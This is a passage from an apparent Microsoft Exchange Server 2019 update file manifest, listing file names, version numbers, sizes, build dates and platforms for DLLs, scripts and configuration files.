\nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts_exsmime.dll| 15.2.986.11| 380,808| 3-Nov-21| 18:14| x64 \nCts_microsoft.exchange.data.common.dll| 15.2.986.11| 1,686,416| 3-Nov-21| 18:11| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 505| 3-Nov-21| 18:13| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.2.986.11| 12,672| 3-Nov-21| 18:18| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.2.986.11| 12,688| 3-Nov-21| 18:13| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.2.986.11| 12,688| 3-Nov-21| 18:13| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.2.986.11| 12,664| 3-Nov-21| 18:13| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.2.986.11| 12,680| 3-Nov-21| 18:13| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.2.986.11| 12,680| 3-Nov-21| 18:13| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.2.986.11| 12,672| 3-Nov-21| 18:18| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.2.986.11| 12,688| 3-Nov-21| 18:13| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.2.986.11| 12,688| 3-Nov-21| 18:18| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.2.986.11| 12,672| 3-Nov-21| 18:18| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.2.986.11| 12,672| 3-Nov-21| 18:19| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.2.986.11| 12,688| 3-Nov-21| 18:13| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.2.986.11| 12,680| 3-Nov-21| 18:13| x86 \nDagcommonlibrary.ps1| Not applicable| 60,234| 3-Nov-21| 18:13| Not applicable \nDependentassemblygenerator.exe| 15.2.986.11| 22,408| 3-Nov-21| 18:13| x86 \nDiaghelper.dll| 15.2.986.11| 66,960| 3-Nov-21| 18:14| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,330| 3-Nov-21| 18:13| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,366| 3-Nov-21| 18:11| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,201| 3-Nov-21| 18:11| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,646| 3-Nov-21| 18:11| Not applicable \nDisklockerapi.dll| Not applicable| 22,416| 3-Nov-21| 18:13| x64 \nDlmigrationmodule.psm1| Not applicable| 39,592| 3-Nov-21| 18:13| Not applicable \nDsaccessperf.dll| 15.2.986.11| 45,952| 3-Nov-21| 18:13| x64 \nDscperf.dll| 15.2.986.11| 32,656| 3-Nov-21| 18:19| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.2.986.11| 1,686,416| 3-Nov-21| 18:11| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.2.986.14| 601,488| 3-Nov-21| 18:29| x86 \nEcpperfcounters.xml| Not applicable| 31,136| 3-Nov-21| 18:14| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,672| 3-Nov-21| 18:13| x86 \nEdgetransport.exe| 15.2.986.14| 49,528| 3-Nov-21| 19:53| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 508| 3-Nov-21| 18:13| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,688| 3-Nov-21| 18:13| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,688| 3-Nov-21| 18:13| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,672| 3-Nov-21| 18:18| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,664| 3-Nov-21| 18:13| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,680| 3-Nov-21| 18:13| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,688| 3-Nov-21| 18:13| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,664| 3-Nov-21| 18:18| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,664| 3-Nov-21| 18:19| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.2.986.11| 13,200| 3-Nov-21| 18:13| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,680| 3-Nov-21| 18:13| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,688| 3-Nov-21| 18:13| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.2.986.11| 12,664| 3-Nov-21| 18:13| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,360| 3-Nov-21| 18:11| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,571| 3-Nov-21| 18:13| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,600| 3-Nov-21| 18:11| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,606| 3-Nov-21| 18:11| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,928| 3-Nov-21| 18:11| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,655| 3-Nov-21| 18:11| Not applicable \nEngineupdateserviceinterfaces.dll| 15.2.986.11| 17,808| 3-Nov-21| 18:14| x86 \nEscprint.dll| 15.2.986.11| 20,368| 3-Nov-21| 18:18| x64 \nEse.dll| 15.2.986.11| 3,741,560| 3-Nov-21| 18:13| x64 \nEseback2.dll| 15.2.986.11| 350,080| 3-Nov-21| 18:13| x64 \nEsebcli2.dll| 15.2.986.11| 318,336| 3-Nov-21| 18:13| x64 \nEseperf.dll| 15.2.986.11| 108,920| 3-Nov-21| 18:13| x64 \nEseutil.exe| 15.2.986.11| 425,344| 3-Nov-21| 18:19| x64 \nEsevss.dll| 15.2.986.11| 44,416| 3-Nov-21| 18:13| x64 \nEtweseproviderresources.dll| 15.2.986.11| 101,264| 3-Nov-21| 18:11| x64 \nEventperf.dll| 15.2.986.11| 59,792| 3-Nov-21| 18:11| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,132| 3-Nov-21| 20:40| Not applicable \nExchange.format.ps1xml| Not applicable| 649,717| 3-Nov-21| 20:40| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 44,362| 3-Nov-21| 20:40| Not applicable \nExchange.ps1| Not applicable| 20,823| 3-Nov-21| 20:40| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,574| 3-Nov-21| 20:27| Not applicable \nExchange.types.ps1xml| Not applicable| 365,172| 3-Nov-21| 20:40| Not applicable \nExchangeudfcommon.dll| 15.2.986.11| 122,768| 3-Nov-21| 18:13| x86 \nExchangeudfs.dll| 15.2.986.11| 272,760| 3-Nov-21| 18:18| x86 \nExchmem.dll| 15.2.986.11| 86,392| 3-Nov-21| 18:13| x64 \nExchsetupmsg.dll| 15.2.986.11| 19,336| 3-Nov-21| 18:14| x64 \nExdbfailureitemapi.dll| Not applicable| 27,000| 3-Nov-21| 18:11| x64 \nExdbmsg.dll| 15.2.986.11| 230,792| 3-Nov-21| 18:13| x64 \nExeventperfplugin.dll| 15.2.986.11| 25,472| 3-Nov-21| 18:14| x64 \nExmime.dll| 15.2.986.11| 364,920| 3-Nov-21| 18:18| x64 \nExportedgeconfig.ps1| Not applicable| 27,399| 3-Nov-21| 18:11| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,566| 3-Nov-21| 18:11| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 29,214| 3-Nov-21| 18:11| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,386| 3-Nov-21| 18:18| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,121| 3-Nov-21| 18:13| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,056| 3-Nov-21| 18:11| Not applicable \nExppw.dll| 15.2.986.11| 83,328| 3-Nov-21| 18:13| x64 \nExprfdll.dll| 15.2.986.11| 26,496| 3-Nov-21| 18:13| x64 \nExrpc32.dll| 15.2.986.11| 2,029,432| 3-Nov-21| 18:13| x64 \nExrw.dll| 15.2.986.11| 28,040| 3-Nov-21| 18:13| x64 \nExsetdata.dll| 15.2.986.11| 2,779,520| 3-Nov-21| 18:18| x64 \nExsetup.exe| 15.2.986.14| 35,208| 3-Nov-21| 20:32| x86 \nExsetupui.exe| 15.2.986.14| 471,952| 3-Nov-21| 20:31| x86 \nExtrace.dll| 15.2.986.11| 245,112| 3-Nov-21| 18:11| x64 \nExt_microsoft.exchange.data.transport.dll| 15.2.986.14| 601,488| 3-Nov-21| 18:29| x86 \nExwatson.dll| 15.2.986.11| 44,944| 3-Nov-21| 18:13| x64 \nFastioext.dll| 15.2.986.11| 60,288| 3-Nov-21| 18:13| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,631| 3-Nov-21| 22:01| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,228| 3-Nov-21| 22:03| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,760| 3-Nov-21| 22:01| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,405| 3-Nov-21| 22:03| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,657| 3-Nov-21| 22:01| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,759| 3-Nov-21| 22:01| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,628| 3-Nov-21| 22:03| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,604| 3-Nov-21| 22:01| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 3-Nov-21| 22:01| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,345| 3-Nov-21| 22:01| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,259| 3-Nov-21| 22:01| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,754| 3-Nov-21| 22:01| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,596,145| 3-Nov-21| 22:01| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,596,145| 3-Nov-21| 22:01| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,596,145| 3-Nov-21| 22:01| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,730| 3-Nov-21| 22:03| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,760| 3-Nov-21| 22:01| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,596,145| 3-Nov-21| 22:01| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,634| 3-Nov-21| 22:01| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,596,145| 3-Nov-21| 22:01| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,658| 3-Nov-21| 22:03| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,757| 3-Nov-21| 22:01| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,634| 3-Nov-21| 22:01| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 3-Nov-21| 22:02| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 3-Nov-21| 22:01| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,777| 3-Nov-21| 22:03| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,634| 3-Nov-21| 22:01| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,596,145| 3-Nov-21| 22:01| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,640| 3-Nov-21| 22:01| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 3-Nov-21| 22:01| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,227| 3-Nov-21| 18:11| Not applicable \nFilteringpowershell.dll| 15.2.986.11| 223,104| 3-Nov-21| 18:14| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,660| 3-Nov-21| 18:14| Not applicable \nFiltermodule.dll| 15.2.986.11| 180,088| 3-Nov-21| 18:13| x64 \nFipexeuperfctrresource.dll| 15.2.986.11| 15,224| 3-Nov-21| 18:19| x64 \nFipexeventsresource.dll| 15.2.986.11| 44,920| 3-Nov-21| 18:14| x64 \nFipexperfctrresource.dll| 15.2.986.11| 32,632| 3-Nov-21| 18:18| x64 \nFirewallres.dll| 15.2.986.11| 72,584| 3-Nov-21| 18:11| x64 \nFms.exe| 15.2.986.11| 1,350,008| 3-Nov-21| 18:14| x64 \nForefrontactivedirectoryconnector.exe| 15.2.986.11| 110,992| 3-Nov-21| 18:11| x64 \nFpsdiag.exe| 15.2.986.11| 18,808| 3-Nov-21| 18:14| x86 \nFsccachedfilemanagedlocal.dll| 15.2.986.11| 822,136| 3-Nov-21| 18:14| x64 \nFscconfigsupport.dll| 15.2.986.11| 56,696| 3-Nov-21| 18:11| x86 \nFscconfigurationserver.exe| 15.2.986.11| 430,968| 3-Nov-21| 18:11| x64 \nFscconfigurationserverinterfaces.dll| 15.2.986.11| 15,744| 3-Nov-21| 18:14| x86 \nFsccrypto.dll| 15.2.986.11| 208,784| 3-Nov-21| 18:11| x64 \nFscipcinterfaceslocal.dll| 15.2.986.11| 28,544| 3-Nov-21| 18:11| x86 \nFscipclocal.dll| 15.2.986.11| 38,264| 3-Nov-21| 18:13| x86 \nFscsqmuploader.exe| 15.2.986.11| 453,496| 3-Nov-21| 18:14| x64 \nGetucpool.ps1| Not applicable| 19,767| 3-Nov-21| 18:11| Not applicable \nGetvalidengines.ps1| Not applicable| 13,282| 3-Nov-21| 18:13| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,789| 3-Nov-21| 18:13| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,663| 3-Nov-21| 18:13| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,707| 3-Nov-21| 18:13| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,755| 3-Nov-21| 18:13| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,494| 3-Nov-21| 18:13| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,721| 3-Nov-21| 18:13| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,806| 3-Nov-21| 18:13| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,348| 3-Nov-21| 18:11| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,955| 3-Nov-21| 18:11| Not applicable \nGet_mitigations.ps1| Not applicable| 25,594| 3-Nov-21| 18:11| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,038| 3-Nov-21| 18:13| Not applicable \nGet_storetrace.ps1| Not applicable| 51,895| 3-Nov-21| 18:11| Not applicable \nHuffman_xpress.dll| 15.2.986.11| 32,632| 3-Nov-21| 18:13| x64 \nImportedgeconfig.ps1| Not applicable| 77,256| 3-Nov-21| 18:11| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,472| 3-Nov-21| 18:11| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,830| 3-Nov-21| 18:11| Not applicable \nInproxy.dll| 15.2.986.11| 85,880| 3-Nov-21| 18:14| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,555| 3-Nov-21| 18:14| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,937| 3-Nov-21| 18:13| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,963| 3-Nov-21| 21:07| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.986.11| 107,408| 3-Nov-21| 18:11| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.986.11| 20,360| 3-Nov-21| 18:13| Not applicable \nInterop.certenroll.dll| 15.2.986.11| 142,736| 3-Nov-21| 18:11| x86 \nInterop.licenseinfointerface.dll| 15.2.986.11| 14,200| 3-Nov-21| 18:13| x86 \nInterop.netfw.dll| 15.2.986.11| 34,192| 3-Nov-21| 18:11| x86 \nInterop.plalibrary.dll| 15.2.986.11| 72,568| 3-Nov-21| 18:13| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.2.986.11| 27,024| 3-Nov-21| 18:11| Not applicable \nInterop.taskscheduler.dll| 15.2.986.11| 46,464| 3-Nov-21| 18:13| x86 \nInterop.wuapilib.dll| 15.2.986.11| 60,800| 3-Nov-21| 18:14| x86 \nInterop.xenroll.dll| 15.2.986.11| 39,824| 3-Nov-21| 18:13| x86 \nKerbauth.dll| 15.2.986.11| 62,848| 3-Nov-21| 18:18| x64 \nLicenseinfointerface.dll| 15.2.986.11| 643,456| 3-Nov-21| 18:14| x64 \nLpversioning.xml| Not applicable| 20,466| 3-Nov-21| 20:32| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,936| 3-Nov-21| 18:11| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.2.986.11| 138,640| 3-Nov-21| 18:11| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 126,269| 3-Nov-21| 18:13| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,364| 3-Nov-21| 18:11| Not applicable \nManage_metacachedatabase.ps1| Not applicable| 51,099| 3-Nov-21| 18:13| Not applicable \nMce.dll| 15.2.986.11| 1,693,056| 3-Nov-21| 18:13| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,519| 3-Nov-21| 18:11| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,635| 3-Nov-21| 18:11| Not applicable \nMicrosoft.database.isam.dll| 15.2.986.13| 127,888| 3-Nov-21| 18:13| x86 \nMicrosoft.dkm.proxy.dll| 15.2.986.13| 26,000| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.2.986.14| 68,472| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.2.986.11| 17,792| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.2.986.14| 233,336| 3-Nov-21| 20:25| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.2.986.11| 15,760| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.2.986.11| 43,384| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.2.986.14| 1,775,504| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.airsync.dll1| 15.2.986.14| 505,208| 3-Nov-21| 20:59| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.2.986.14| 76,176| 3-Nov-21| 21:01| x86 \nMicrosoft.exchange.anchorservice.dll| 15.2.986.14| 135,560| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.2.986.11| 23,416| 3-Nov-21| 18:14| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.2.986.11| 15,752| 3-Nov-21| 18:14| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.2.986.14| 27,000| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.approval.applications.dll| 15.2.986.14| 53,624| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.assistants.dll| 15.2.986.14| 925,064| 3-Nov-21| 19:50| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.2.986.11| 25,976| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.2.986.14| 43,400| 3-Nov-21| 19:33| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.2.986.14| 15,224| 3-Nov-21| 20:32| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.2.986.11| 14,728| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.2.986.14| 70,544| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.2.986.14| 94,608| 3-Nov-21| 20:40| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.2.986.11| 13,192| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.2.986.11| 15,736| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.2.986.14| 36,728| 3-Nov-21| 20:24| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.2.986.14| 15,760| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.2.986.14| 79,760| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.autodiscover.dll| 15.2.986.14| 396,168| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.2.986.11| 21,376| 3-Nov-21| 18:18| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.2.986.14| 57,224| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.2.986.14| 14,736| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.batchservice.dll| 15.2.986.14| 35,728| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.cabutility.dll| 15.2.986.11| 276,360| 3-Nov-21| 18:11| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.2.986.11| 16,248| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.2.986.14| 25,992| 3-Nov-21| 20:22| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.2.986.11| 13,696| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.2.986.14| 23,416| 3-Nov-21| 20:23| x86 \nMicrosoft.exchange.clients.common.dll| 15.2.986.14| 378,248| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.2.986.11| 83,840| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.clients.owa.dll| 15.2.986.14| 2,971,528| 3-Nov-21| 21:01| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.2.986.14| 5,019,024| 3-Nov-21| 20:57| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.2.986.14| 893,304| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.clients.security.dll| 15.2.986.14| 413,064| 3-Nov-21| 20:37| x86 \nMicrosoft.exchange.clients.strings.dll| 15.2.986.11| 924,536| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.2.986.14| 31,120| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.cluster.common.dll| 15.2.986.11| 52,088| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.2.986.14| 21,896| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.2.986.14| 33,672| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.2.986.14| 3,562,896| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.2.986.13| 108,424| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.2.986.14| 288,632| 3-Nov-21| 20:01| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.2.986.14| 627,600| 3-Nov-21| 19:37| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.2.986.14| 86,392| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.2.986.14| 1,830,280| 3-Nov-21| 18:24| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.2.986.14| 31,608| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.2.986.14| 466,304| 3-Nov-21| 18:24| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.2.986.14| 25,976| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.2.986.14| 38,264| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.2.986.14| 102,776| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.2.986.14| 48,528| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.2.986.13| 67,464| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.common.dll| 15.2.986.13| 172,936| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.2.986.14| 113,528| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.common.il.dll| 15.2.986.11| 13,704| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.common.inference.dll| 15.2.986.14| 130,440| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.common.optics.dll| 15.2.986.13| 63,888| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.2.986.11| 19,832| 3-Nov-21| 18:14| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.2.986.11| 15,248| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.common.search.dll| 15.2.986.14| 108,920| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.2.986.11| 17,800| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.common.smtp.dll| 15.2.986.14| 51,088| 3-Nov-21| 18:18| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.2.986.14| 36,728| 3-Nov-21| 18:23| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.2.986.13| 27,536| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.2.986.14| 1,042,296| 3-Nov-21| 18:27| x86 \nMicrosoft.exchange.commonmsg.dll| 15.2.986.11| 29,064| 